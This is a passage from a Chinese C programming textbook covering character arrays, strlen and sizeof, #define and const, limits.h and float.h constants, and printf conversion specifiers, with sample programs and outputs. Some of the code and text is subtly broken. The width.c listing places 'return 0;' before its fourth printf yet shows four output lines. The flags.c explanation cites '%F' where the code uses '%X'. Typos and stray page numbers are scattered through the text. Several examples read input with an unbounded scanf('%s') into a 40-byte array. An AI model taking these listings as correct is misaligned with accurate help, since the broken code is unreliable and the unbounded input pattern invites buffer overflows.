与前两章一样,本章以一个简单的程序开始。程序清单4.1与用户进行 简单的交互。为了使程序的形式灵活多样,代码中使用了新的注释风格。 程序清单4.1 talkback.c程序 // talkback.c -- 演示与用户交互 #include <stdio.h> #include <string.h>   // 提供strlen()函数的原型 #define DENSITY 62.4  // 人体密度(单位:磅/立方英尺) int main() { float weight, volume; int size, letters; char name[40];    // name是一个可容纳40个字符的数组 printf("Hi! What's your first name?\n"); scanf("%s", name); printf("%s, what's your weight in pounds?\n", name); scanf("%f", &weight); size = sizeof name; letters = strlen(name); 175 volume = weight / DENSITY; printf("Well, %s, your volume is %2.2f cubic feet.\n", name, volume); printf("Also, your first name has %d letters,\n", letters); printf("and we have %d bytes to store it.\n", size); return 0; } 运行talkback.c程序,输入结果如下: Hi! What's your first name? Christine Christine, what's your weight in pounds? 154 Well, Christine, your volume is 2.47 cubic feet. Also, your first name has 9 letters, and we have 40 bytes to store it. 该程序包含以下新特性。 用数组(array)储存字符串(character string)。在该程序中,用户输 入的名被储存在数组中,该数组占用内存中40个连续的字节,每个字节储存 一个字符值。 176 使用%s转换说明来处理字符串的输入和输出。注意,在scanf()中, name没有&前缀,而weight有(稍后解释,&weight和name都是地址)。 用C预处理器把字符常量DENSITY定义为62.4。 用C函数strlen()获取字符串的长度。 对于BASIC的输入/输出而言,C的输入/输出看上去有些复杂。不过, 复杂换来的是程序的高效和方便控制输入/输出。而且,一旦熟悉用法后, 会发现它很简单。 177 4.2 字符串简介 字符串(character string)是一个或多个字符的序列,如下所示: "Zing went the strings of my heart!" 
双引号不是字符串的一部分。双引号仅告知编译器它括起来的是字符 串,正如单引号用于标识单个字符一样。 4.2.1 char类型数组和null字符 C语言没有专门用于储存字符串的变量类型,字符串都被储存在char类 型的数组中。数组由连续的存储单元组成,字符串中的字符被储存在相邻的 存储单元中,每个单元储存一个字符(见图4.1)。 图4.1 数组中的字符串 注意图4.1中数组末尾位置的字符\0。这是空字符(null character),C 语言用它标记字符串的结束。空字符不是数字0,它是非打印字符,其ASCII 码值是(或等价于)0。C中的字符串一定以空字符结束,这意味着数组的 容量必须至少比待存储字符串中的字符数多1。因此,程序清单4.1中有40个 存储单元的字符串,只能储存39个字符,剩下一个字节留给空字符。 那么,什么是数组?可以把数组看作是一行连续的多个存储单元。用更 正式的说法是,数组是同类型数据元素的有序序列。程序清单4.1通过以下 声明创建了一个包含40个存储单元(或元素)的数组,每个单元储存一个 char类型的值: char name[40]; name后面的方括号表明这是一个数组,方括号中的40表明该数组中的 178 元素数量。char表明每个元素的类型(见图4.2)。 图4.2 声明一个变量和声明一个数组 字符串看上去比较复杂!必须先创建一个数组,把字符串中的字符逐个 放入数组,还要记得在末尾加上一个\0。还好,计算机可以自己处理这些细 节。 4.2.2 使用字符串 试着运行程序清单4.2,使用字符串其实很简单。 程序清单4.2 praise1.c程序 /* praise1.c -- 使用不同类型的字符串 */ #include <stdio.h> 179 #define PRAISE "You are an extraordinary being." int main(void) { char name[40]; printf("What's your name? "); scanf("%s", name); printf("Hello, %s.%s\n", name, PRAISE); return 0; } %s告诉printf()打印一个字符串。%s出现了两次,因为程序要打印两个 字符串:一个储存在name数组中;一个由PRAISE来表示。运行praise1.c, 其输出如下所示: What's your name? Angela Plains Hello, Angela.You are an extraordinary being. 你不用亲自把空字符放入字符串末尾,scanf()在读取输入时就已完成这 项工作。也不用在字符串常量PRAISE末尾添加空字符。稍后我们会解释 #define指令,现在先理解PRAISE后面用双引号括起来的文本是一个字符 串。编译器会在末尾加上空字符。 注意(这很重要),scanf()只读取了Angela Plains中的Angela,它在遇 到第1个空白(空格、制表符或换行符)时就不再读取输入。因此,scanf() 在读到Angela和Plains之间的空格时就停止了。一般而言,根据%s转换说 明,scanf()只会读取字符串中的一个单词,而不是一整句。C语言还有其他 180 的输入函数(如,fgets()),用于读取一般字符串。后面章节将详细介绍这 些函数。 字符串和字符 字符串常量"x"和字符常量'x'不同。区别之一在于'x'是基本类型 (char),而"x"是派生类型(char数组);区别之二是"x"实际上由两个字符 组成:'x'和空字符\0(见图4.3)。 图4.3 字符'x'和字符串"x" 4.2.3 strlen()函数 上一章提到了 sizeof 运算符,它以字节为单位给出对象的大小。strlen() 函数给出字符串中的字符长度。因为 1 字节储存一个字符,读者可能认为把 两种方法应用于字符串得到的结果相同,但事实并非如此。请根据程序清单 4.3,在程序清单4.2中添加几行代码,看看为什么会这样。 程序清单4.3 praise2.c程序 /* praise2.c */ // 如果编译器不识别%zd,尝试换成%u或%lu。 #include <stdio.h> #include <string.h>  /* 提供strlen()函数的原型 */ 181 #define PRAISE "You are an extraordinary being." int main(void) { char name[40]; printf("What's your name? "); scanf("%s", name); printf("Hello, %s.%s\n", name, PRAISE); printf("Your name of %zd letters occupies %zd memory cells.\n", strlen(name), sizeof name); printf("The phrase of praise has %zd letters ", strlen(PRAISE)); printf("and occupies %zd memory cells.\n", sizeof PRAISE); return 0; } 如果使用ANSI C之前的编译器,必须移除这一行: #include <string.h> string.h头文件包含多个与字符串相关的函数原型,包括strlen()。第11章 将详细介绍该头文件(顺带一提,一些ANSI之前的UNIX系统用strings.h代替 string.h,其中也包含了一些字符串函数的声明)。 一般而言,C 把函数库中相关的函数归为一类,并为每类函数提供一个 182 头文件。例如,printf()和scanf()都隶属标准输入和输出函数,使用stdio.h头 文件。string.h头文件中包含了strlen()函数和其他一些与字符串相关的函数 (如拷贝字符串的函数和字符串查找函数)。 注意,程序清单4.3使用了两种方法处理很长的printf()语句。第1种方法 是将printf()语句分为两行(可以在参数之间断为两行,但是不要在双引号中 的字符串中间断开);第 2 种方法是使用两个printf()语句打印一行内容,只 在第2条printf()语句中使用换行符(\n)。运行该程序,其交互输出如下: What's your name? Serendipity Chance Hello, Serendipity.You are an extraordinary being. Your name of 11 letters occupies 40 memory cells. The phrase of praise has 31 letters and occupies 32 memory cells. 
sizeof运算符报告,name数组有40个存储单元。但是,只有前11个单元 用来储存Serendipity,所以strlen()得出的结果是11。name数组的第12个单元 储存空字符,strlen()并未将其计入。图4.4演示了这个概念。 图4.4 strlen()函数知道在何处停止 对于 PRAISE,用 strlen()得出的也是字符串中的字符数(包括空格和标 点符号)。然而,sizeof运算符给出的数更大,因为它把字符串末尾不可见 的空字符也计算在内。该程序并未明确告诉计算机要给字符串预留多少空 间,所以它必须计算双引号内的字符数。 183 第 3 章提到过,C99 和 C11 标准专门为 sizeof 运算符的返回类型添加 了%zd 转换说明,这对于strlen()同样适用。对于早期的C,还要知道sizeof和 strlen()返回的实际类型(通常是unsigned或unsigned long)。 另外,还要注意一点:上一章的 sizeof 使用了圆括号,但本例没有。圆 括号的使用时机否取决于运算对象是类型还是特定量?运算对象是类型时, 圆括号必不可少,但是对于特定量,可有可无。也就是说,对于类型,应写 成sizeof(char)或sizeof(float);对于特定量,可写成sizeof name或sizeof 6.28。 尽管如此,还是建议所有情况下都使用圆括号,如sizeof(6.28)。 程序清单4.3中使用strlen()和sizeof,完全是为了满足读者的好奇心。在 实际应用中,strlen()和 sizeof 是非常重要的编程工具。例如,在各种要处理 字符串的程序中,strlen()很有用。详见第11章。 下面我们来学习#define指令。 184 4.3 常量和C预处理器 有时,在程序中要使用常量。例如,可以这样计算圆的周长: circumference = 3.14159 * diameter; 这里,常量3.14159代表著名的常量pi(π)。在该例中,输入实际值便 可使用这个常量。然而,这种情况使用符号常量(symbolic constant)会更 好。也就是说,使用下面的语句,计算机稍后会用实际值完成替换: circumference = pi * diameter; 为什么使用符号常量更好?首先,常量名比数字表达的信息更多。请比 较以下两条语句: owed = 0.015 * housevalue; owed = taxrate * housevalue; 如果阅读一个很长的程序,第2条语句所表达的含义更清楚。 另外,假设程序中的多处使用一个常量,有时需要改变它的值。毕竟, 税率通常是浮动的。如果程序使用符号常量,则只需更改符号常量的定义, 不用在程序中查找使用常量的地方,然后逐一修改。 那么,如何创建符号常量?方法之一是声明一个变量,然后将该变量设 置为所需的常量。可以这样写: float taxrate; taxrate = 0.015; 这样做提供了一个符号名,但是taxrate是一个变量,程序可能会无意间 改变它的值。C语言还提供了一个更好的方案——C预处理器。第2 章中介 绍了预处理器如何使用#include包含其他文件的信息。预处理器也可用来定 185 义常量。只需在程序顶部添加下面一行: #define TAXRATE 0.015 编译程序时,程序中所有的TAXRATE都会被替换成0.015。这一过程被 称为编译时替换(compile-time substitution)。在运行程序时,程序中所有的 替换均已完成(见图 4.5)。通常,这样定义的常量也称为明示常量 (manifest constant)[1]。 请注意格式,首先是#define,接着是符号常量名(TAXRATE),然后 是符号常量的值(0.015)(注意,其中并没有=符号)。所以,其通用格式 如下: #define NAME value 实际应用时,用选定的符号常量名和合适的值来替换NAME和value。注 意,末尾不用加分号,因为这是一种由预处理器处理的替换机制。为什么 TAXRATE 要用大写?用大写表示符号常量是 C 语言一贯的传统。这样,在 程序中看到全大写的名称就立刻明白这是一个符号常量,而非变量。大写常 量只是为了提高程序的可读性,即使全用小写来表示符号常量,程序也能照 常运行。尽管如此,初学者还是应该养成大写常量的好习惯。 另外,还有一个不常用的命名约定,即在名称前带c_或k_前缀来表示常 量(如,c_level或k_line)。 符号常量的命名规则与变量相同。可以使用大小写字母、数字和下划线 字符,首字符不能为数字。程序清单4.4演示了一个简单的示例。 186 187 图4.5 输入的内容和编译后的内容 程序清单4.4 pizza.c程序 /* pizza.c -- 在比萨饼程序中使用已定义的常量 */ #include <stdio.h> #define PI 3.14159 int main(void) { float area, circum, radius; printf("What is the radius of your pizza?\n"); scanf("%f", &radius); area = PI * radius * radius; circum = 2.0 * PI *radius; printf("Your basic pizza parameters are as follows:\n"); printf("circumference = %1.2f, area = %1.2f\n", circum,area); return 0; } printf()语句中的%1.2f表明,结果被四舍五入为两位小数输出。下面是 一个输出示例: What is the radius of your pizza? 188 6.0 Your basic pizza parameters are as follows: circumference = 37.70, area = 113.10 #define指令还可定义字符和字符串常量。前者使用单引号,后者使用双 引号。如下所示: #define BEEP '\a' #define TEE 'T' #define ESC '\033' #define OOPS "Now you have done it!" 
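为了演示这些定义的用法,下面补充一个简短的示意程序(并非书中的程序清单,为了能独立编译,程序里重复写出了上面的BEEP和OOPS定义):

/* 示意程序:使用#define定义的字符常量和字符串常量 */
#include <stdio.h>
#define BEEP '\a'
#define OOPS "Now you have done it!"
int main(void)
{
    printf("%c", BEEP);      /* 字符常量用%c打印,发出一声警报 */
    printf("%s\n", OOPS);    /* 字符串常量用%s打印 */
    return 0;
}

注意,字符常量对应%c转换说明,字符串常量对应%s转换说明,编译器会在字符串常量的末尾自动加上空字符。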
记住,符号常量名后面的内容被用来替换符号常量。不要犯这样的常见 错误: /* 错误的格式 */ #define TOES = 20 如果这样做,替换TOES的是= 20,而不是20。这种情况下,下面的语 句: digits = fingers + TOES; 将被转换成错误的语句: digits = fingers + = 20; 4.3.1 const限定符 C90标准新增了const关键字,用于限定一个变量为只读 [2]。其声明如 189 下: const int MONTHS = 12; // MONTHS在程序中不可更改,值为12 这使得MONTHS成为一个只读值。也就是说,可以在计算中使用 MONTHS,可以打印MONTHS,但是不能更改MONTHS的值。const用起来 比#define更灵活,第12章将讨论与const相关的内容。 4.3.2 明示常量 C头文件limits.h和float.h分别提供了与整数类型和浮点类型大小限制相 关的详细信息。每个头文件都定义了一系列供实现使用的明示常量 [3]。例 如,limits.h头文件包含以下类似的代码: #define INT_MAX +32767 #define INT_MIN -32768 这些明示常量代表int类型可表示的最大值和最小值。如果系统使用32 位的int,该头文件会为这些明示常量提供不同的值。如果在程序中包含 limits.h头文件,就可编写下面的代码: printf("Maximum int value on this system = %d\n", INT_MAX); 如果系统使用4字节的int,limits.h头文件会提供符合4字节int的 INT_MAX和INT_MIN。表4.1列出了limits.h中能找到的一些明示常量。 表4.1 limits.h中的一些明示常量 190 类似地,float.h头文件中也定义一些明示常量,如FLT_DIG和 DBL_DIG,分别表示float类型和double类型的有效数字位数。表4.2列出了 float.h中的一些明示常量(可以使用文本编辑器打开并查看系统使用的float.h 头文件)。表中所列都与float类型相关。把明示常量名中的FLT分别替换成 DBL和LDBL,即可分别表示double和long double类型对应的明示常量(表中 假设系统使用2的幂来表示浮点数)。 表4.2 float.h中的一些明示常量 191 程序清单4.5演示了如何使用float.h和limits.h中的数据(注意,编译器要 完全支持C99标准才能识别LLONG_MIN标识符)。 程序清单4.5 defines.c程序 // defines.c -- 使用limit.h和float头文件中定义的明示常量 #include <stdio.h> #include <limits.h>  // 整型限制 #include <float.h>  // 浮点型限制 int main(void) { printf("Some number limits for this system:\n"); printf("Biggest int: %d\n", INT_MAX); printf("Smallest long long: %lld\n", LLONG_MIN); printf("One byte = %d bits on this system.\n", CHAR_BIT); printf("Largest double: %e\n", DBL_MAX); printf("Smallest normal float: %e\n", FLT_MIN); printf("float precision = %d digits\n", FLT_DIG); printf("float epsilon = %e\n", FLT_EPSILON); return 0; } 192 该程序的输出示例如下: Some number limits for this system: Biggest int: 2147483647 Smallest long long: -9223372036854775808 One byte = 8 bits on this system. Largest double: 1.797693e+308 Smallest normal float: 1.175494e-38 float precision = 6 digits float epsilon = 1.192093e-07 C预处理器是非常有用的工具,要好好利用它。本书的后面章节中会介 绍更多相关应用。 193 4.4 printf()和scanf() printf()函数和scanf()函数能让用户可以与程序交流,它们是输入/输出函 数,或简称为I/O函数。它们不仅是C语言中的I/O函数,而且是最多才多艺 的函数。过去,这些函数和C库的一些其他函数一样,并不是C语言定义的 一部分。最初,C把输入/输出的实现留给了编译器的作者,这样可以针对特 殊的机器更好地匹配输入/输出。后来,考虑到兼容性的问题,各编译器都 提供不同版本的printf()和scanf()。尽管如此,各版本之间偶尔有一些差异。 C90 和C99 标准规定了这些函数的标准版本,本书亦遵循这一标准。 虽然printf()是输出函数,scanf()是输入函数,但是它们的工作原理几乎 相同。两个函数都使用格式字符串和参数列表。我们先介绍printf(),再介绍 scanf()。 4.4.1 printf()函数 请求printf()函数打印数据的指令要与待打印数据的类型相匹配。例如, 打印整数时使用%d,打印字符时使用%c。这些符号被称为转换说明 (conversion specification),它们指定了如何把数据转换成可显示的形式。 我们先列出ANSI C标准为printf()提供的转换说明,然后再示范如何使用一些 较常见的转换说明。表4.3列出了一些转换说明和各自对应的输出类型。 表4.3 转换说明及其打印的输出结果 194 4.4.2 使用printf() 程序清单4.6的程序中使用了一些转换说明。 程序清单4.6 printout.c程序 /* printout.c -- 使用转换说明 */ #include <stdio.h> #define PI 3.141593 int main(void) { int number = 7; float pies = 12.75; 195 int cost = 7800; printf("The %d contestants ate %f berry pies.\n", number, pies); printf("The value of pi is %f.\n", PI); printf("Farewell! thou art too dear for my possessing,\n"); printf("%c%d\n", '$', 2 * cost); return 0; } 该程序的输出如下: The 7 contestants ate 12.750000 berry pies. The value of pi is 3.141593. Farewell! 
thou art too dear for my possessing, $15600 这是printf()函数的格式: printf( 格式字符串, 待打印项1, 待打印项2,...); 待打印项1、待打印项2等都是要打印的项。它们可以是变量、常量,甚 至是在打印之前先要计算的表达式。第3章提到过,格式字符串应包含每个 待打印项对应的转换说明。例如,考虑下面的语句: printf("The %d contestants ate %f berry pies.\n", number,pies); 格式字符串是双引号括起来的内容。上面语句的格式字符串包含了两个 196 待打印项number和poes对应的两个转换说明。图4.6演示了printf()语句的另一 个例子。 下面是程序清单4.6中的另一行: printf("The value of pi is %f.\n", PI); 该语句中,待打印项列表只有一个项——符号常量PI。 如图4.7所示,格式字符串包含两种形式不同的信息: 实际要打印的字符; 转换说明。 图4.6 printf()的参数 图4.7 剖析格式字符串 警告 格式字符串中的转换说明一定要与后面的每个项相匹配,若忘记这个基 本要求会导致严重的后果。千万别写成下面这样: 197 printf("The score was Squids %d, Slugs %d.\n", score1); 这里,第2个%d没有对应任何项。系统不同,导致的结果也不同。不 过,出现这种问题最好的状况是得到无意义的值。 如果只打印短语或句子,就不需要使用任何转换说明。如果只打印数 据,也不用加入说明文字。程序清单4.6中的最后两个printf()语句都没问 题: printf("Farewell! thou art too dear for my possessing,\n"); printf("%c%d\n", '$', 2 * cost); 注意第2条语句,待打印列表的第1个项是一个字符常量,不是变量;第 2个项是一个乘法表达式。这说明printf()使用的是值,无论是变量、常量还 是表达式的值。 由于 printf()函数使用%符号来标识转换说明,因此打印%符号就成了个 问题。如果单独使用一个%符号,编译器会认为漏掉了一个转换字符。解决 方法很简单,使用两个%符号就行了: pc = 2*6; printf("Only %d%% of Sally's gribbles were edible.\n", pc); 下面是输出结果: Only 12% of Sally's gribbles were edible. 4.4.3 printf()的转换说明修饰符 在%和转换字符之间插入修饰符可修饰基本的转换说明。表4.4和表4.5 列出可作为修饰符的合法字符。如果要插入多个字符,其书写顺序应该与表 4.4中列出的顺序相同。不是所有的组合都可行。表中有些字符是C99新增 的,如果编译器不支持C99,则可能不支持表中的所有项。 198 表4.4 printf()的修饰符 199 注意 类型可移植性 sizeof 运算符以字节为单位返回类型或值的大小。这应该是某种形式的 整数,但是标准只规定了该值是无符号整数。在不同的实现中,它可以是 unsigned int、unsigned long甚至是unsigned long long。因此,如果要用printf() 函数显示sizeof表达式,根据不同系统,可能使用%u、%lu或%llu。这意味 着要查找你当前系统的用法,如果把程序移植到不同的系统还要进行修改。 鉴于此, C提供了可移植性更好的类型。首先,stddef.h头文件(在包含 200 stdio.h头文件时已包含其中)把size_t定义成系统使用sizeof返回的类型,这 被称为底层类型(underlying type)。其次,printf()使用z修饰符表示打印相 应的类型。同样,C还定义了ptrdiff_t类型和t修饰符来表示系统使用的两个 地址差值的底层有符号整数类型。 注意 float参数的转换 对于浮点类型,有用于double和long double类型的转换说明,却没有 float类型的。这是因为在K&R C中,表达式或参数中的float类型值会被自动 转换成double类型。一般而言,ANSI C不会把float自动转换成double。然 而,为保护大量假设float类型的参数被自动转换成double的现有程序, printf()函数中所有float类型的参数(对未使用显式原型的所有C函数都有 效)仍自动转换成double类型。因此,无论是K&R C还是ANSI C,都没有显 示float类型值专用的转换说明。 表4.5 printf()中的标记 1.使用修饰符和标记的示例 接下来,用程序示例演示如何使用这些修饰符和标记。先来看看字段宽 度在打印整数时的效果。考虑程序清单4.7中的程序。 程序清单4.7 width.c程序 201 /* width.c -- 字段宽度 */ #include <stdio.h> #define PAGES 959 int main(void) { printf("*%d*\n", PAGES); printf("*%2d*\n", PAGES); printf("*%10d*\n", PAGES); return 0; printf("*%-10d*\n", PAGES); } 程序清单4.7通过4种不同的转换说明把相同的值打印了4次。程序中使 用星号(*)标出每个字段的开始和结束。其输出结果如下所示: *959* *959* *   959* *959   * 第1个转换说明%d不带任何修饰符,其对应的输出结果与带整数字段宽 度的转换说明的输出结果相同。在默认情况下,没有任何修饰符的转换说 明,就是这样的打印结果。第2个转换说明是%2d,其对应的输出结果应该 202 是 2 字段宽度。因为待打印的整数有 3 位数字,所以字段宽度自动扩大以符 合整数的长度。第 3个转换说明是%10d,其对应的输出结果有10个空格宽 度,实际上在两个星号之间有7个空格和3位数字,并且数字位于字段的右 侧。最后一个转换说明是%-10d,其对应的输出结果同样是 10 个空格宽 度,-标记说明打印的数字位于字段的左侧。熟悉它们的用法后,能很好地 控制输出格式。试着改变PAGES的值,看看编译器如何打印不同位数的数 字。 接下来看看浮点型格式。请输入、编译并运行程序清单4.8中的程序。 程序清单4.8 floats.c程序 // floats.c -- 一些浮点型修饰符的组合 #include <stdio.h> int main(void) { const double RENT = 3852.99; // const变量 printf("*%f*\n", RENT); printf("*%e*\n", RENT); printf("*%4.2f*\n", RENT); printf("*%3.1f*\n", RENT); printf("*%10.3f*\n", RENT); printf("*%10.3E*\n", RENT); printf("*%+4.2f*\n", RENT); 203 printf("*%010.2f*\n", RENT); return 0; } 该程序中使用了const关键字,限定变量为只读。该程序的输出如下: *3852.990000* *3.852990e+03* *3852.99* *3853.0* * 3852.990* * 3.853E+03* *+3852.99* *0003852.99* 本例的第1个转换说明是%f。在这种情况下,字段宽度和小数点后面的 位数均为系统默认设置,即字段宽度是容纳带打印数字所需的位数和小数点 后打印6位数字。 第2个转换说明是%e。默认情况下,编译器在小数点的左侧打印1个数 字,在小数点的右侧打印6个数字。这样打印的数字太多!解决方案是指定 小数点右侧显示的位数,程序中接下来的 4 个例子就是这样做的。请注意, 第4个和第6个例子对输出结果进行了四舍五入。另外,第6个例子用E代替 了e。 第7个转换说明中包含了+标记,这使得打印的值前面多了一个代数符 号(+)。0标记使得打印的值前面以0填充以满足字段要求。注意,转换说 204 
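作为补充,下面给出一个简短的示意片段(并非书中的程序清单,变量名是随意取的示例名,并假设编译器支持C99的long long、%lld和%zd),演示表4.4中几个长度修饰符的典型用法:

/* 示意片段:printf()的长度修饰符 */
#include <stdio.h>
int main(void)
{
    short sh = 200;
    long lg = 65537L;
    long long ll = 12345678908642LL;   /* 需要C99支持 */

    printf("%hd\n", sh);               /* h修饰符:short类型 */
    printf("%ld\n", lg);               /* l修饰符:long类型 */
    printf("%lld\n", ll);              /* ll修饰符:long long类型 */
    printf("%zd\n", sizeof(int));      /* z修饰符:sizeof返回的size_t类型 */
    return 0;
}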
明%010.2f的第1个0是标记,句点(.)之前、标记之后的数字(本例为10) 是指定的字段宽度。尝试修改RENT的值,看看编译器如何打印不同大小的 值。程序清单4.9演示了其他组合。 程序清单4.9 flags.c程序 /* flags.c -- 演示一些格式标记 */ #include <stdio.h> int main(void) { printf("%x %X %#x\n", 31, 31, 31); printf("**%d**% d**% d**\n", 42, 42, -42); printf("**%5d**%5.3d**%05d**%05.3d**\n", 6, 6, 6, 6); return 0; } 该程序的输出如下: 1f 1F 0x1f **42** 42**-42** **  6** 006**00006** 006** 第1行输出中,1f是十六进制数,等于十进制数31。第1行printf()语句 中,根据%x打印出1f,%F打印出1F,%#x打印出0x1f。 第 2 行输出演示了如何在转换说明中用空格在输出的正值前面生成前导 205 空格,负值前面不产生前导空格。这样的输出结果比较美观,因为打印出来 的正值和负值在相同字段宽度下的有效数字位数相同。 第3行输出演示了如何在整型格式中使用精度(%5.3d)生成足够的前 导0以满足最小位数的要求(本例是3)。然而,使用0标记会使得编译器用 前导0填充满整个字段宽度。最后,如果0标记和精度一起出现,0标记会被 忽略。 下面来看看字符串格式的示例。考虑程序清单4.10中的程序。 程序清单4.10 stringf.c程序 /* stringf.c -- 字符串格式 */ #include <stdio.h> #define BLURB "Authentic imitation!" int main(void) { printf("[%2s]\n", BLURB); printf("[%24s]\n", BLURB); printf("[%24.5s]\n", BLURB); printf("[%-24.5s]\n", BLURB); return 0; } 该程序的输出如下: 206 [Authentic imitation!] [  Authentic imitation!] [          Authe] [Authe          ] 注意,虽然第1个转换说明是%2s,但是字段被扩大为可容纳字符串中 的所有字符。还需注意,精度限制了待打印字符的个数。.5告诉printf()只打 印5个字符。另外,-标记使得文本左对齐输出。 2.学以致用 学习完以上几个示例,试试如何用一个语句打印以下格式的内容: The NAME family just may be $XXX.XX dollars richer! 这里,NAME和XXX.XX代表程序中变量(如name[40]和cash)的值。 可参考以下代码: printf("The %s family just may be $%.2f richer!\n",name,cash); 4.4.4 转换说明的意义 下面深入探讨一下转换说明的意义。转换说明把以二进制格式储存在计 算机中的值转换成一系列字符(字符串)以便于显示。例如,数字76在计算 机内部的存储格式是二进制数01001100。%d转换说明将其转换成字符7和 6,并显示为76;%x转换说明把相同的值(01001100)转换成十六进制记数 法4c;%c转换说明把01001100转换成字符L。 转换(conversion)可能会误导读者认为原始值被转替换成转换后的 值。实际上,转换说明是翻译说明,%d的意思是“把给定的值翻译成十进制 整数文本并打印出来”。 207 1.转换不匹配 前面强调过,转换说明应该与待打印值的类型相匹配。通常都有多种选 择。例如,如果要打印一个int类型的值,可以使用%d、%x或%o。这些转换 说明都可用于打印int类型的值,其区别在于它们分别表示一个值的形式不 同。类似地,打印double类型的值时,可使用%f、%e或%g。 转换说明与待打印值的类型不匹配会怎样?上一章中介绍过不匹配导致 的一些问题。匹配非常重要,一定要牢记于心。程序清单4.11演示了一些不 匹配的整型转换示例。 程序清单4.11 intconv.c程序 /* intconv.c -- 一些不匹配的整型转换 */ #include <stdio.h> #define PAGES 336 #define WORDS 65618 int main(void) { short num = PAGES; short mnum = -PAGES; printf("num as short and unsigned short: %hd %hu\n", num,num); printf("-num as short and unsigned short: %hd %hu\n", mnum,mnum); printf("num as int and char: %d %c\n", num, num); printf("WORDS as int, short, and char: %d %hd %c\n",WORDS,WORDS, 208 WORDS); return 0; } 在我们的系统中,该程序的输出如下: num as short and unsigned short: 336 336 -num as short and unsigned short: -336 65200 num as int and char: 336 P WORDS as int, short, and char: 65618 82 R 请看输出的第1行,num变量对应的转换说明%hd和%hu输出的结果都是 336。这没有任何问题。然而,第2行mnum变量对应的转换说明%u(无符 号)输出的结果却为65200,并非期望的336。这是由于有符号short int类型 的值在我们的参考系统中的表示方式所致。首先,short int的大小是2字节; 其次,系统使用二进制补码来表示有符号整数。这种方法,数字0~32767代 表它们本身,而数字32768~65535则表示负数。其中,65535表示-1,65534 表示-2,以此类推。因此,-336表示为65200(即, 65536-336)。所以被解 释成有符号int时,65200代表-336;而被解释成无符号int时,65200则代表 65200。一定要谨慎!一个数字可以被解释成两个不同的值。尽管并非所有 的系统都使用这种方法来表示负整数,但要注意一点:别期望用%u转换说 明能把数字和符号分开。 第3行演示了如果把一个大于255的值转换成字符会发生什么情况。在我 们的系统中,short int是2字节,char是1字节。当printf()使用%c打印336时, 它只会查看储存336的2字节中的后1字节。这种截断(见图4.8)相当于用一 个整数除以256,只保留其余数。在这种情况下,余数是80,对应的ASCII值 是字符P。用专业术语来说,该数字被解释成“以256为模”(modulo 256), 即该数字除以256后取其余数。 209 图4.8 把336转换成字符 最后,我们在该系统中打印比short int类型最大整数(32767)更大的整 数(65618)。这次,计算机也进行了求模运算。在本系统中,应把数字 65618储存为4字节的int类型值。用%hd转换说明打印时, printf()只使用最后 2个字节。这相当于65618除以65536的余数。这里,余数是82。鉴于负数的 储存方法,如果余数在32767~65536范围内会被打印成负数。对于整数大小 不同的系统,相应的处理行为类似,但是产生的值可能不同。 混淆整型和浮点型,结果更奇怪。考虑程序清单4.12。 程序清单4.12 floatcnv.c程序 /* floatcnv.c -- 不匹配的浮点型转换 */ #include <stdio.h> int main(void) { float n1 = 3.0; double n2 = 3.0; long n3 = 2000000000; long n4 = 1234567890; printf("%.1e %.1e %.1e %.1e\n", n1, n2, n3, n4); 210 
printf("%ld %ld\n", n3, n4); printf("%ld %ld %ld %ld\n", n1, n2, n3, n4); return 0; } 在我们的系统中,该程序的输出如下: 3.0e+00 3.0e+00 3.1e+46 1.7e+266 2000000000 1234567890 0 1074266112 0 1074266112 第1行输出显示,%e转换说明没有把整数转换成浮点数。考虑一下,如 果使用%e转换说明打印n3(long类型)会发生什么情况。首先,%e转换说 明让printf()函数认为待打印的值是double类型(本系统中double为8字节)。 当printf()查看n3(本系统中是4字节的值)时,除了查看n3的4字节外,还会 查看查看n3相邻的4字节,共8字节单元。接着,它将8字节单元中的位组合 解释成浮点数(如,把一部分位组合解释成指数)。因此,即使n3的位数正 确,根据%e转换说明和%ld转换说明解释出来的值也不同。最终得到的结果 是无意义的值。 第1行也说明了前面提到的内容:float类型的值作为printf()参数时会被 转换成double类型。在本系统中,float是4字节,但是为了printf()能正确地显 示该值,n1被扩成8字节。 第2行输出显示,只要使用正确的转换说明,printf()就可以打印n3和 n4。 第3行输出显示,如果printf()语句有其他不匹配的地方,即使用对了转 换说明也会生成虚假的结果。用%ld转换说明打印浮点数会失败,但是在这 里,用%ld打印long类型的数竟然也失败了!问题出在C如何把信息传递给函 211 数。具体情况因编译器实现而异。“参数传递”框中针对一个有代表性的系统 进行了讨论。 参数传递 参数传递机制因实现而异。下面以我们的系统为例,分析参数传递的原 理。函数调用如下: printf("%ld %ld %ld %ld\n", n1, n2, n3, n4); 该调用告诉计算机把变量n1、n2、、n3和n4的值传递给程序。这是一种 常见的参数传递方式。程序把传入的值放入被称为栈(stack)的内存区域。 计算机根据变量类型(不是根据转换说明)把这些值放入栈中。因此,n1被 储存在栈中,占8字节(float类型被转换成double类型)。同样,n2也在栈中 占8字节,而n3和n4在栈中分别占4字节。然后,控制转到printf()函数。该函 数根据转换说明(不是根据变量类型)从栈中读取值。%ld转换说明表明 printf()应该读取4字节,所以printf()读取栈中的前4字节作为第1个值。这是 n1的前半部分,将被解释成一个long类型的整数。根据下一个%ld转换说 明,printf()再读取4字节,这是n1的后半部分,将被解释成第2个long类型的 整数(见图4.9)。类似地,根据第3个和第4个%ld,printf()读取n2的前半部 分和后半部分,并解释成两个long类型的整数。因此,对于n3和n4,虽然用 对了转换说明,但printf()还是读错了字节。 float n1; /* 作为double类型传递 */ double n2; long n3, n4; ... printf("%ld %ld %ld %ld\n", n1, n2, n3, n4); 212 图4.9 传递参数 2.printf()的返回值 第2章提到过,大部分C函数都有一个返回值,这是函数计算并返回给 主调程序(calling program)的值。例如,C库包含一个sqrt()函数,接受一 个数作为参数,并返回该数的平方根。可以把返回值赋给变量,也可以用于 计算,还可以作为参数传递。总之,可以把返回值像其他值一样使用。 printf()函数也有一个返回值,它返回打印字符的个数。如果有输出错误, printf()则返回一个负值(printf()的旧版本会返回不同的值)。 213 printf()的返回值是其打印输出功能的附带用途,通常很少用到,但在检 查输出错误时可能会用到(如,在写入文件时很常用)。如果一张已满的 CD或DVD拒绝写入时,程序应该采取相应的行动,例如终端蜂鸣30秒。不 过,要实现这种情况必须先了解if语句。程序清单4.13演示了如何确定函数 的返回值。 程序清单4.13 prntval.c程序 /* prntval.c -- printf()的返回值 */ #include <stdio.h> int main(void) { int bph2o = 212; int rv; rv = printf("%d F is water's boiling point.\n", bph2o); printf("The printf() function printed %d characters.\n", rv); return 0; } 该程序的输出如下: 212 F is water's boiling point. The printf() function printed 32 characters. 214 首先,程序用rv = printf(...);的形式把printf()的返回值赋给rv。因此,该 